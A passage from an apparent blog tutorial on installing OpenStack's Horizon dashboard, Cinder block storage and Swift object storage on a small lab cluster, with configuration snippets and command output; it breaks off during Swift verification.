+--------------------------------------+--------------------+------------+-------------------+-------+-------+---------------------------+
| ID                                   | Agent Type         | Host       | Availability Zone | Alive | State | Binary                    |
+--------------------------------------+--------------------+------------+-------------------+-------+-------+---------------------------+
| 64f8361f-8948-4eec-9950-bf825923f250 | Metadata agent     | controller | None              | :-)   | UP    | neutron-metadata-agent    |
| 898b76b2-da96-4ae3-838e-7aaf2d20a10b | Linux bridge agent | controller | None              | :-)   | UP    | neutron-linuxbridge-agent |
| 97e09a16-ba6a-457e-9b35-866a36b4db52 | DHCP agent         | controller | nova              | :-)   | UP    | neutron-dhcp-agent        |
| e49601df-6481-4e25-aee6-58256f4eae0d | Linux bridge agent | compute    | None              | :-)   | UP    | neutron-linuxbridge-agent |
+--------------------------------------+--------------------+------------+-------------------+-------+-------+---------------------------+

We can see our Neutron services listed, and alive. Great!

Installing Horizon, the Dashboard Service

When most end users interact with OpenStack, they think of Horizon, which is the graphical webapp that users can use to interact with their OpenStack cluster.

Horizon pulls information in from other sources, and doesn’t have its own database or other persistence mechanisms, so we can install it, configure it and go.

I’m going to be following the Horizon Install Documentation

We are going to install Horizon to the controller.

The package is a simple apt install:

$ sudo apt install openstack-dashboard

From there, we can do some configuration:

$ sudo vim /etc/openstack-dashboard/local_settings.py

OPENSTACK_HOST = "controller"
OPENSTACK_KEYSTONE_URL = "http://%s:5000/v3" % OPENSTACK_HOST

From there we need to allow any host to connect, note, leave the ALLOWED_HOSTS in the Ubuntu section intact. At the commented one out at the top of the file, make a new entry with:

#ALLOWED_HOSTS = ['horizon.example.com', ]
ALLOWED_HOSTS = ['*', ]

You probably don’t want to do that for a production cluster, but we are just making a toy cluster to learn how OpenStack works.

Onward to configuring memcached:

SESSION_ENGINE = 'django.contrib.sessions.backends.cache'

CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': 'controller:11211',
    },
}

The main changes here is adding the “controller” location, and setting the SESSION_ENGINE.

Back to some more changes:

OPENSTACK_API_VERSIONS = {
    "identity": 3,
    "image": 2,
    "volume": 3,
}

OPENSTACK_KEYSTONE_DEFAULT_DOMAIN = "Default"

OPENSTACK_KEYSTONE_DEFAULT_ROLE = "user"

Since we configured a provider network and disallow users from creating their own L3 network topologies, we need to disable L3 networking services:

OPENSTACK_NEUTRON_NETWORK = {
    'enable_auto_allocated_network': False,
    'enable_distributed_router': False,
    'enable_fip_topology_check': False,
    'enable_ha_router': False,
    'enable_ipv6': False,
    # TODO(amotoki): Drop OPENSTACK_NEUTRON_NETWORK completely from here.
    # enable_quotas has the different default value here.
    'enable_quotas': False,
    'enable_rbac_policy': True,
    'enable_router': False,
    'enable_lb': False,
    'enable_firewall': False,
    'enable_vpn': False,
}

From there we have one small change to apache2:

$ /etc/apache2/conf-available/openstack-dashboard.conf
WSGIApplicationGroup %{GLOBAL}

In my case, the line was already present and I did not need to do anything.

To get Horizon up and running, we just need to restart the service:

$ sudo systemctl restart apache2

Let’s test Horizon out. Open up a web browser, and head to: http://10.0.0.11/horizon. Hopefully you see:

Woohoo! Now we are getting places. Do you like that branded dashboard. I do.

Lets login. Log in with the admin user, aka admin and openstack.

Isn’t that a sight for sore eyes? Soon we will be rewarded by being able to launch our first instance from Horizon. Only a few more services to go now.

Installing Cinder, the Block Storage Service

Cinder is OpenStack’s block storage service, and it offers persistent block storage devices for virtual machines. It implements a simple scheduler to determine which storage node a particular block storage request should be fulfilled on, much like nova-scheduler.

I’m going to be following the Cinder Install Documentation.

Setting Up Cinder Databases and Services on the Controller

We need to establish the Cinder database and create the OpenStack service definitions on the controller.

Let’s make the database and grant privileges:

$ sudo mysql
MariaDB [(none)]> CREATE DATABASE cinder;
Query OK, 1 row affected (0.013 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON cinder.* TO 'cinder'@'localhost' \
  IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON cinder.* TO 'cinder'@'%' \
  IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.001 sec)

From there, create a user and add it to the service role:

$ openstack user create --domain default --password-prompt cinder
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field               | Value                            |
+---------------------+----------------------------------+
| domain_id           | default                          |
| enabled             | True                             |
| id                  | c3829e1a25074642bd1602bfbf2e5ec3 |
| name                | cinder                           |
| options             | {}                               |
| password_expires_at | None                             |
+---------------------+----------------------------------+
$ openstack role add --project service --user cinder admin

Now we can create the service. Note that we are actually going to create two services, one for Cinder API v2, and one for v3. Not all OpenStack services and client tools have been updated to fully support newer API versions, and in this case, we need both versions of the Cinder API to be around.

$ openstack service create --name cinderv2 --description "OpenStack Block Storage" volumev2
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | OpenStack Block Storage          |
| enabled     | True                             |
| id          | e78b48b9847b480ab0f24c1a83d33000 |
| name        | cinderv2                         |
| type        | volumev2                         |
+-------------+----------------------------------+
$ openstack service create --name cinderv3 --description "OpenStack Block Storage" volumev3
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | OpenStack Block Storage          |
| enabled     | True                             |
| id          | 898b8bd404df4c45b44cab44ee8dc16a |
| name        | cinderv3                         |
| type        | volumev3                         |
+-------------+----------------------------------+

Lets define the two sets of API endpoints:

For v2:

$ openstack endpoint create --region RegionOne volumev2 public http://controller:8776/v2/%\(project_id\)s
+--------------+------------------------------------------+
| Field        | Value                                    |
+--------------+------------------------------------------+
| enabled      | True                                     |
| id           | 1d937d8c869c42b2aee7d18362205693         |
| interface    | public                                   |
| region       | RegionOne                                |
| region_id    | RegionOne                                |
| service_id   | e78b48b9847b480ab0f24c1a83d33000         |
| service_name | cinderv2                                 |
| service_type | volumev2                                 |
| url          | http://controller:8776/v2/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev2 internal http://controller:8776/v2/%\(project_id\)s
+--------------+------------------------------------------+
| Field        | Value                                    |
+--------------+------------------------------------------+
| enabled      | True                                     |
| id           | 005a0f43cd1e45c3bbc5298fdd3ae7ed         |
| interface    | internal                                 |
| region       | RegionOne                                |
| region_id    | RegionOne                                |
| service_id   | e78b48b9847b480ab0f24c1a83d33000         |
| service_name | cinderv2                                 |
| service_type | volumev2                                 |
| url          | http://controller:8776/v2/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev2 admin http://controller:8776/v2/%\(project_id\)s
+--------------+------------------------------------------+
| Field        | Value                                    |
+--------------+------------------------------------------+
| enabled      | True                                     |
| id           | 8a048cac157c4bb094bc529b9d8eede3         |
| interface    | admin                                    |
| region       | RegionOne                                |
| region_id    | RegionOne                                |
| service_id   | e78b48b9847b480ab0f24c1a83d33000         |
| service_name | cinderv2                                 |
| service_type | volumev2                                 |
| url          | http://controller:8776/v2/%(project_id)s |
+--------------+------------------------------------------+

For v3:

$ openstack endpoint create --region RegionOne volumev3 public http://controller:8776/v3/%\(project_id\)s
+--------------+------------------------------------------+
| Field        | Value                                    |
+--------------+------------------------------------------+
| enabled      | True                                     |
| id           | 4d1f8bd850e04220808674a9ad81fd52         |
| interface    | public                                   |
| region       | RegionOne                                |
| region_id    | RegionOne                                |
| service_id   | 898b8bd404df4c45b44cab44ee8dc16a         |
| service_name | cinderv3                                 |
| service_type | volumev3                                 |
| url          | http://controller:8776/v3/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev3 internal http://controller:8776/v3/%\(project_id\)s
+--------------+------------------------------------------+
| Field        | Value                                    |
+--------------+------------------------------------------+
| enabled      | True                                     |
| id           | ca49e233d0fa4ff7b1554d01afbc68ce         |
| interface    | internal                                 |
| region       | RegionOne                                |
| region_id    | RegionOne                                |
| service_id   | 898b8bd404df4c45b44cab44ee8dc16a         |
| service_name | cinderv3                                 |
| service_type | volumev3                                 |
| url          | http://controller:8776/v3/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev3 admin http://controller:8776/v3/%\(project_id\)s
+--------------+------------------------------------------+
| Field        | Value                                    |
+--------------+------------------------------------------+
| enabled      | True                                     |
| id           | 3d5ed2a3b6e347a08f8ec79a98f7e95f         |
| interface    | admin                                    |
| region       | RegionOne                                |
| region_id    | RegionOne                                |
| service_id   | 898b8bd404df4c45b44cab44ee8dc16a         |
| service_name | cinderv3                                 |
| service_type | volumev3                                 |
| url          | http://controller:8776/v3/%(project_id)s |
+--------------+------------------------------------------+

Installing Cinder to the Controller

Now that the databases and service descriptions have been created we can go ahead and install some packages:

$ sudo apt install cinder-api cinder-scheduler

Once that is done, we can do some configuration. Lets add the database creds:

$ sudo vim /etc/cinder/cinder.conf
[DEFAULT]
...
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone
my_ip = 10.0.0.11

[database]
#connection = sqlite:////var/lib/cinder/cinder.sqlite
connection = mysql+pymysql://cinder:password123@controller/cinder

Now we can configure Keystone:

[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = cinder
password = openstack

Also configure the lockfile:

[oslo_concurrency]
lock_path = /var/lib/cinder/tmp

We can then populate the database with:

$ sudo -s
# su -s /bin/sh -c "cinder-manage db sync" cinder

After that, we need to tell Nova to use Cinder for block storage.

$ sudo vim /etc/nova/nova.conf
[cinder]
os_region_name = RegionOne

From there, we need to restart the Nova and Cinder services:

$ sudo systemctl restart nova-api
$ sudo systemctl restart cinder-scheduler
$ sudo systemctl restart apache2

Installing Cinder to the Block Storage Machine

Set Up LVM For the Cinder Disk

Time to get Cinder installed to our block storage node. We are going to be using LVM to manage the storage disk, which requires some setup.

Install some LVM tools:

$ sudo apt install lvm2 thin-provisioning-tools

From there, we need to determine what device to use. Run lsblk and we see:

$ lsblk
vda    252:0    0   10G  0 disk 
├─vda1 252:1    0    1M  0 part 
└─vda2 252:2    0   10G  0 part /
vdb    252:16   0   10G  0 disk

/dev/vda is the disk the operating system is installed on, since we have a 1Mb boot partition, and a 10gb disk. This means /dev/vdb is the disk we will prepare for use with Cinder.

We need to create a LVM physical volume and a volume group on the disk:

$ sudo pvcreate /dev/vdb
  Physical volume "/dev/vdb" successfully created.
$ sudo vgcreate cinder-volumes /dev/vdb
  Volume group "cinder-volumes" successfully created

Now, we also need to edit the LVM configuration file. LVM will automatically scan block storage devices in /dev to see if they contain volumes, and this can cause some trouble when it detects the many volumes Cinder will be making. So, we will change LVMs behaviour from exploring all block devices for volumes, to only scan /dev/vdb and not to go deeper, by adding a filter.

$ sudo vim /etc/lvm/lvm.conf
devices {
...
filter = [ "a/vdb/", "r/.*/"]

Install and Configure the Cinder Service

Now we can install the Cinder packages:

$ sudo apt install cinder-volume

Lets edit some configuration, and add some DB creds:

$ sudo vim /etc/cinder/cinder.conf
[DEFAULT]
...
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone
my_ip = 10.0.0.31
enabled_backends = lvm
glance_api_servers = http://controller:9292

[database]
#connection = sqlite:////var/lib/cinder/cinder.sqlite
connection = mysql+pymysql://cinder:password123@controller/cinder

Lets set up Keystone:

[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = cinder
password = openstack

We need to configure some LVM settings:

[lvm]
volume_driver = cinder.volume.drivers.lvm.LVMVolumeDriver
volume_group = cinder-volumes
target_protocol = iscsi
target_helper = tgtadm

What this does is configure Cinder to pass block storage volumes to the instances we make over iscsi. This is how we get away with not having the disks physically connected to the instances, and being on a different host to the compute host.

And we need to set a lockfile path:

[oslo_concurrency]
lock_path = /var/lib/cinder/tmp

The last thing we need to do is restart some services:

$ sudo systemctl restart tgt
$ sudo systemctl restart cinder-volume

Verifying that Cinder was Installed Correctly

Head back to the controller, source the admin creds, and list all volume services:

$ . admin-openrc
$ openstack volume service list
+------------------+-------------------+------+---------+-------+----------------------------+
| Binary           | Host              | Zone | Status  | State | Updated At                 |
+------------------+-------------------+------+---------+-------+----------------------------+
| cinder-scheduler | controller        | nova | enabled | up    | 2020-01-31T02:42:17.000000 |
| cinder-volume    | block-storage@lvm | nova | enabled | up    | 2020-01-31T02:42:20.000000 |
+------------------+-------------------+------+---------+-------+----------------------------+

We see cinder-scheduler running on the controller, and cinder-volume running on the block storage machine, with both services alive. I think we are done setting up Cinder.

Installing Swift, the Object Storage Service

Swift is the object storage service for OpenStack. Swift takes in objects of any size and replicates them across a storage cluster. Swift uses a eventual consistency model, as opposed to Ceph, which uses strong consistency model. This means an object you get from Swift may or may not be the latest version of that object.

Swift is fast and robust, and we will be integrating it into this cluster.

I’m going to be following the Installation Documentation.

Creating Users and Set Up Services and Endpoints

Swift uses sqlite databases on the object storage nodes, so we do not need to add any database entries. So, we can get right to making users.

SSH into the controller, source the admin creds, and make a swift user.

$ . admin-openrc
$ openstack user create --domain default --password-prompt swift
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field               | Value                            |
+---------------------+----------------------------------+
| domain_id           | default                          |
| enabled             | True                             |
| id                  | 4f74761ec0b74087b91eb8431388b174 |
| name                | swift                            |
| options             | {}                               |
| password_expires_at | None                             |
+---------------------+----------------------------------+
$ openstack role add --project service --user swift admin

Now we can make the Swift service:

$ openstack service create --name swift \
  --description "OpenStack Object Storage" object-store
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | OpenStack Object Storage         |
| enabled     | True                             |
| id          | aa1bb7fe0ffb4144b295ac0d752a6933 |
| name        | swift                            |
| type        | object-store                     |
+-------------+----------------------------------+

And the endpoints:

$ openstack endpoint create --region RegionOne \
>   object-store public http://controller:8080/v1/AUTH_%\(project_id\)s
+--------------+-----------------------------------------------+
| Field        | Value                                         |
+--------------+-----------------------------------------------+
| enabled      | True                                          |
| id           | d25b1f10c3f14fc98fd87a8b17fb405d              |
| interface    | public                                        |
| region       | RegionOne                                     |
| region_id    | RegionOne                                     |
| service_id   | aa1bb7fe0ffb4144b295ac0d752a6933              |
| service_name | swift                                         |
| service_type | object-store                                  |
| url          | http://controller:8080/v1/AUTH_%(project_id)s |
+--------------+-----------------------------------------------+
$ openstack endpoint create --region RegionOne \
  object-store internal http://controller:8080/v1/AUTH_%\(project_id\)s
+--------------+-----------------------------------------------+
| Field        | Value                                         |
+--------------+-----------------------------------------------+
| enabled      | True                                          |
| id           | 4289f12ec58a46669092f3645ca48d26              |
| interface    | internal                                      |
| region       | RegionOne                                     |
| region_id    | RegionOne                                     |
| service_id   | aa1bb7fe0ffb4144b295ac0d752a6933              |
| service_name | swift                                         |
| service_type | object-store                                  |
| url          | http://controller:8080/v1/AUTH_%(project_id)s |
+--------------+-----------------------------------------------+
$ openstack endpoint create --region RegionOne \
  object-store admin http://controller:8080/v1
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | 9c6a6d0a1d784da49c53d92f3387285d |
| interface    | admin                            |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | aa1bb7fe0ffb4144b295ac0d752a6933 |
| service_name | swift                            |
| service_type | object-store                     |
| url          | http://controller:8080/v1        |
+--------------+----------------------------------+

Installing Swift to the Controller

Let’s install some packages and configure them.

$ sudo apt install swift swift-proxy python3-swiftclient

From there, we will need to manually create some directories and files:

$ sudo mkdir /etc/swift
$ sudo curl -o /etc/swift/proxy-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/proxy-server.conf-sample

Time to edit the configuration:

$ sudo vim /etc/swift/proxy-server.conf
[DEFAULT]
bind_ip = 10.0.0.11
bind_port = 8080
# keep_idle = 600
# bind_timeout = 30
# backlog = 4096
 swift_dir = /etc/swift
 user = swift

In the [pipeline:main] section, remove tempurl and tempauth, and replace with authtoken and keystoneauth like so:

[pipeline:main]
pipeline = catch_errors gatekeeper healthcheck proxy-logging cache listing_formats container_sync bulk ratelimit authtoken keystoneauth copy container-quotas account-quotas slo dlo versioned_writes symlink proxy-logging proxy-server

Back to it:

[app:proxy-server]
use = egg:swift#proxy
account_autocreate = True

[filter:keystoneauth]
use = egg:swift#keystoneauth
operator_roles = admin,user

Let’s set up keystone:

[filter:authtoken]
paste.filter_factory = keystonemiddleware.auth_token:filter_factory
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_id = default
user_domain_id = default
project_name = service
username = swift
password = openstack
delay_auth_decision = True

Finally, a small config change for memcached:

[filter:cache]
use = egg:swift#memcache
memcache_servers = controller:11211

Setting Up Disks on Each of the Object Storage Machines

The next set of steps we need to do on both of the Object Storage nodes.

Install some packages:

$ sudo apt install xfsprogs rsync

We now need to determine what drives we have, so run lsblk:

vda    252:0    0   10G  0 disk 
├─vda1 252:1    0    1M  0 part 
└─vda2 252:2    0   10G  0 part /
vdb    252:16   0   10G  0 disk 
vdc    252:32   0   10G  0 disk

We see that vdb and vdc are our disks. Lets format with them XFS:

$ sudo mkfs.xfs /dev/vdb
$ sudo mkfs.xfs /dev/vdc

From there, we will set up persistent mountpoints under /srv:

$ sudo mkdir -p /srv/node/vdb
$ sudo mkdir -p /srv/node/vdc

Next, edit fstab:

$ sudo vim /etc/fstab
/dev/vdb /srv/node/vdb xfs noatime,nodiratime,logbufs=8 0 2
/dev/vdc /srv/node/vdc xfs noatime,nodiratime,logbufs=8 0 2

Mount the drives:

$ sudo mount /srv/node/vdb
$ sudo mount /srv/node/vdc

Time to set up rsync:

sudo vim /etc/rsyncd.conf

uid = swift
gid = swift
log file = /var/log/rsyncd.log
pid file = /var/run/rsyncd.pid
address = 10.0.0.41

[account]
max connections = 2
path = /srv/node/
read only = False
lock file = /var/lock/account.lock

[container]
max connections = 2
path = /srv/node/
read only = False
lock file = /var/lock/container.lock

[object]
max connections = 2
path = /srv/node/
read only = False
lock file = /var/lock/object.lock

Make sure the IP address is correct for the machine you are editing it on.

Enable rsync with:

$ sudo vim /etc/default/rsync
RSYNC_ENABLE=true

Restart rsync with:

$ sudo systemctl restart rsync

Installing Swift to the Object Storage Machines

Time to install and configure Swift on our object storage nodes. We need to do the following on each of our nodes.

$ sudo apt install swift swift-account swift-container swift-object

From there, we need to edit our configuration files. We need to download them first:

$ sudo curl -o /etc/swift/account-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/account-server.conf-sample
$ sudo curl -o /etc/swift/container-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/container-server.conf-sample
$ sudo curl -o /etc/swift/object-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/object-server.conf-sample

Lets edit our config, starting with account-server.conf:

$ sudo vim /etc/swift/account-server.conf
[DEFAULT]
bind_ip = 10.0.0.41
bind_port = 6202
user = swift
swift_dir = /etc/swift
devices = /srv/node
mount_check = true

[pipeline:main]
pipeline = healthcheck recon account-server

[filter:recon]
use = egg:swift#recon
recon_cache_path = /var/cache/swift

Make sure you use the correct IP address for your object storage node.

Onto container-server.conf:

$ sudo vim /etc/swift/container-server.conf
[DEFAULT]
bind_ip = 10.0.0.41
bind_port = 6201
user = swift
swift_dir = /etc/swift
devices = /srv/node
mount_check = true

[pipeline:main]
pipeline = healthcheck recon container-server

[filter:recon]
use = egg:swift#recon
recon_cache_path = /var/cache/swift

Finally, object-server.conf:

$ sudo vim /etc/swift/object-server.conf
[DEFAULT]
bind_ip = 10.0.0.41
bind_port = 6200
user = swift
swift_dir = /etc/swift
devices = /srv/node
mount_check = true

[pipeline:main]
pipeline = healthcheck recon object-server

[filter:recon]
use = egg:swift#recon
recon_cache_path = /var/cache/swift
recon_lock_path = /var/lock

We then need to ensure some directories exist and the swift user has access to it:

$ sudo chown -R swift:swift /srv/node
$ sudo mkdir -p /var/cache/swift
$ sudo chown -R root:swift /var/cache/swift
$ sudo chmod -R 775 /var/cache/swift

Creating and Deploying Starting Swift Rings

Swift has three main parts of its storage architecture, and it was hinted at in the previous section. Swift has the idea of “rings” to separate concerns within its architecture. There is the account ring, the container ring and the object ring.

We need to configure the different rings on the controller, and then take the configuration generated and give it to all the object storage nodes.

So SSH into the controller, and let’s make some rings:

$ cd /etc/swift

The account ring initial config sits in the account.builder file, which we will create:

$ sudo swift-ring-builder account.builder create 10 3 1

Then we can add our rings. We need to add both object storage nodes, and both of their disks.

$ sudo swift-ring-builder account.builder add \
  --region 1 --zone 1 --ip 10.0.0.41 --port 6202 --device vdb --weight 100
Device d0r1z1-10.0.0.41:6202R10.0.0.41:6202/vdb_"" with 100.0 weight got id 0
$ sudo swift-ring-builder account.builder add \
  --region 1 --zone 1 --ip 10.0.0.41 --port 6202 --device vdc --weight 100
Device d1r1z1-10.0.0.41:6202R10.0.0.41:6202/vdc_"" with 100.0 weight got id 1
$ 
$ sudo swift-ring-builder account.builder add \
  --region 1 --zone 1 --ip 10.0.0.51 --port 6202 --device vdb --weight 100
Device d2r1z1-10.0.0.51:6202R10.0.0.51:6202/vdb_"" with 100.0 weight got id 2
$ sudo swift-ring-builder account.builder add \
  --region 1 --zone 1 --ip 10.0.0.51 --port 6202 --device vdc --weight 100
Device d3r1z1-10.0.0.51:6202R10.0.0.51:6202/vdc_"" with 100.0 weight got id 3

From there, we can examine the ring contents with:

$ sudo swift-ring-builder account.builder
account.builder, build version 4, id c77e5777355547608a121a2949a175dc
1024 partitions, 3.000000 replicas, 1 regions, 1 zones, 4 devices, 100.00 balance, 0.00 dispersion
The minimum number of hours before a partition can be reassigned is 1 (0:00:00 remaining)
The overload factor is 0.00% (0.000000)
Ring file account.ring.gz not found, probably it hasn't been written yet
Devices:   id region zone ip address:port replication ip:port  name weight partitions balance flags meta
            0      1    1  10.0.0.41:6202      10.0.0.41:6202   vdb 100.00          0 -100.00       
            1      1    1  10.0.0.41:6202      10.0.0.41:6202   vdc 100.00          0 -100.00       
            2      1    1  10.0.0.51:6202      10.0.0.51:6202   vdb 100.00          0 -100.00       
            3      1    1  10.0.0.51:6202      10.0.0.51:6202   vdc 100.00          0 -100.00

We can rebalance the account ring with:

$ sudo swift-ring-builder account.builder rebalance
Reassigned 3072 (300.00%) partitions. Balance is now 0.00.  Dispersion is now 0.00

Next up is the container ring. Let’s make the container.builder file:

$ sudo swift-ring-builder container.builder create 10 3 1

We can add our rings with the below, taking care to include each node and each disk:

$ sudo swift-ring-builder container.builder add \
  --region 1 --zone 1 --ip 10.0.0.41 --port 6201 --device vdb --weight 100
Device d0r1z1-10.0.0.41:6201R10.0.0.41:6201/vdb_"" with 100.0 weight got id 0
$ sudo swift-ring-builder container.builder add \
  --region 1 --zone 1 --ip 10.0.0.41 --port 6201 --device vdc --weight 100
Device d1r1z1-10.0.0.41:6201R10.0.0.41:6201/vdc_"" with 100.0 weight got id 1
$
$ sudo swift-ring-builder container.builder add \
  --region 1 --zone 1 --ip 10.0.0.51 --port 6201 --device vdb --weight 100
Device d2r1z1-10.0.0.51:6201R10.0.0.51:6201/vdb_"" with 100.0 weight got id 2
$ sudo swift-ring-builder container.builder add \
  --region 1 --zone 1 --ip 10.0.0.51 --port 6201 --device vdc --weight 100
Device d3r1z1-10.0.0.51:6201R10.0.0.51:6201/vdc_"" with 100.0 weight got id 3

Again, we can view the contents with:

$ sudo swift-ring-builder container.builder
container.builder, build version 4, id ac293f6e2e2248798e213382f4b9f60e
1024 partitions, 3.000000 replicas, 1 regions, 1 zones, 4 devices, 100.00 balance, 0.00 dispersion
The minimum number of hours before a partition can be reassigned is 1 (0:00:00 remaining)
The overload factor is 0.00% (0.000000)
Ring file container.ring.gz not found, probably it hasn't been written yet
Devices:   id region zone ip address:port replication ip:port  name weight partitions balance flags meta
            0      1    1  10.0.0.41:6201      10.0.0.41:6201   vdb 100.00          0 -100.00       
            1      1    1  10.0.0.41:6201      10.0.0.41:6201   vdc 100.00          0 -100.00       
            2      1    1  10.0.0.51:6201      10.0.0.51:6201   vdb 100.00          0 -100.00       
            3      1    1  10.0.0.51:6201      10.0.0.51:6201   vdc 100.00          0 -100.00 

We can rebalance the ring with:

$ sudo swift-ring-builder container.builder rebalance
Reassigned 3072 (300.00%) partitions. Balance is now 0.00.  Dispersion is now 0.00

Next up is the object ring:

$ sudo swift-ring-builder object.builder create 10 3 1

We can add the nodes to the ring with:

$ sudo swift-ring-builder object.builder add \
  --region 1 --zone 1 --ip 10.0.0.41 --port 6200 --device vdb --weight 100
Device d0r1z1-10.0.0.41:6200R10.0.0.41:6200/vdb_"" with 100.0 weight got id 0
$ sudo swift-ring-builder object.builder add \
  --region 1 --zone 1 --ip 10.0.0.41 --port 6200 --device vdc --weight 100
Device d1r1z1-10.0.0.41:6200R10.0.0.41:6200/vdc_"" with 100.0 weight got id 1
$
$ sudo swift-ring-builder object.builder add \
  --region 1 --zone 1 --ip 10.0.0.51 --port 6200 --device vdb --weight 100
Device d2r1z1-10.0.0.51:6200R10.0.0.51:6200/vdb_"" with 100.0 weight got id 2
$ sudo swift-ring-builder object.builder add \
  --region 1 --zone 1 --ip 10.0.0.51 --port 6200 --device vdc --weight 100
Device d3r1z1-10.0.0.51:6200R10.0.0.51:6200/vdc_"" with 100.0 weight got id 3

We can view the contents of the ring with:

$ sudo swift-ring-builder object.builder
object.builder, build version 4, id 092ad11e9c4d4939a6a4a6acf110cea0
1024 partitions, 3.000000 replicas, 1 regions, 1 zones, 4 devices, 100.00 balance, 0.00 dispersion
The minimum number of hours before a partition can be reassigned is 1 (0:00:00 remaining)
The overload factor is 0.00% (0.000000)
Ring file object.ring.gz not found, probably it hasn't been written yet
Devices:   id region zone ip address:port replication ip:port  name weight partitions balance flags meta
            0      1    1  10.0.0.41:6200      10.0.0.41:6200   vdb 100.00          0 -100.00       
            1      1    1  10.0.0.41:6200      10.0.0.41:6200   vdc 100.00          0 -100.00       
            2      1    1  10.0.0.51:6200      10.0.0.51:6200   vdb 100.00          0 -100.00       
            3      1    1  10.0.0.51:6200      10.0.0.51:6200   vdc 100.00          0 -100.00

We can rebalance with:

$ sudo swift-ring-builder object.builder rebalance
Reassigned 3072 (300.00%) partitions. Balance is now 0.00.  Dispersion is now 0.00

If you look in /etc/swift, there is now some compressed archives:

$ ll /etc/swift
total 116
drwxr-xr-x   3 root root  4096 Feb  6 00:22 ./
drwxr-xr-x 121 root root  4096 Feb  4 23:05 ../
-rw-r--r--   1 root root  9827 Feb  6 00:13 account.builder
-rw-r--r--   1 root root  1475 Feb  6 00:13 account.ring.gz
drwxr-xr-x   2 root root  4096 Feb  6 00:22 backups/
-rw-r--r--   1 root root  9827 Feb  6 00:18 container.builder
-rw-r--r--   1 root root  1489 Feb  6 00:18 container.ring.gz
-rw-r--r--   1 root root  9827 Feb  6 00:22 object.builder
-rw-r--r--   1 root root  1471 Feb  6 00:22 object.ring.gz
-rw-r--r--   1 root root 53820 Feb  4 23:23 proxy-server.conf

These need to be copied to each of the object storage nodes. Lets do that.

$ for x in 10.0.0.41 10.0.0.51; do scp *.ring.gz ubuntu@$x:~/;done
ubuntu@10.0.0.41's password: 
account.ring.gz              100% 1475   562.7KB/s   00:00    
container.ring.gz            100% 1489     3.1MB/s   00:00    
object.ring.gz               100% 1471     2.3MB/s   00:00    
ubuntu@10.0.0.51's password: 
account.ring.gz              100% 1475   607.6KB/s   00:00    
container.ring.gz            100% 1489     3.7MB/s   00:00    
object.ring.gz               100% 1471     2.8MB/s   00:00

Now log onto both the object storage nodes and move the archives to /etc/swift:

$ sudo mv *.ring.gz /etc/swift

Setting up the Master Swift Configuration

The last thing we need to do is to set up the master configuration for Swift. SSH into your controller node, and let’s do it:

Change into the /etc/swift directory.

$ cd /etc/swift

Download the config file:

$ sudo curl -o /etc/swift/swift.conf \
  https://opendev.org/openstack/swift/raw/branch/master/etc/swift.conf-sample

We need to generate two secrets, which we will again do with openssl:

$ openssl rand -hex 6
6243f9946d1e
$ openssl rand -hex 6
69bab31f606c

And edit /etc/swift/swift.conf:

$ sudo vim /etc/swift/swift.conf
[swift-hash]
swift_hash_path_suffix = 6243f9946d1e
swift_hash_path_prefix = 69bab31f606c

[storage-policy:0]
name = Policy-0
default = yes

From there, this /etc/swift/swift.conf file needs to be distributed to all the object storage nodes:

$ for x in 10.0.0.41 10.0.0.51; do scp /etc/swift/swift.conf ubuntu@$x:~/; done
ubuntu@10.0.0.41's password: 
swift.conf                   100% 8451     2.9MB/s   00:00    
ubuntu@10.0.0.51's password: 
swift.conf                   100% 8451     1.7MB/s   00:00

Then SSH into each of the object storage nodes and move the file to /etc/swift/swift.conf:

$ sudo mv swift.conf /etc/swift/swift.conf
$ sudo chown -R root:swift /etc/swift

Lastly, we need to restart the services:

On the controller:

$ sudo systemctl restart memcached
$ sudo systemctl restart swift-proxy

On the object storage nodes:

$ sudo swift-init all start

Verifying Swift Was Installed Correctly

We can see if swift is working correctly by making a container and placing an object in it. Do the following on the controller node:

$ . demo-openrc
$ swift stat
               Account: AUTH_33569bb56110474db2d584b4a1936c6b
            Containers: 0
               Objects: 0
                 Bytes: 0
          Content-Type: text/plain; charset=utf-8
           X-Timestamp: 1580951741.32857
       X-Put-Timestamp: 1580951741.32857
            X-Trans-Id: tx0dec10331bb941488a804-005e3b68bc
X-Openstack-Request-Id: tx0dec10331bb941488a804-005e3b68bc

Now we will make a container, make a file, and place it in the container:

$ openstack container create container1
+---------------------------------------+------------+------------------------------------+
| account                               | container  | x-trans-id                         |
+---------------------------------------+------------+------------------------------------+
| AUTH_33569bb56110474db2d584b4a1936c6b | container1 | txc383885cf6d44d2fb3f07-005e3b6a65 |
+---------------------------------------+------------+------------------------------------+
$ echo "Test for Demo user" > test_file.txt
$ openstack object create container1 test_file.txt 
+---------------+------------+----------------------------------+
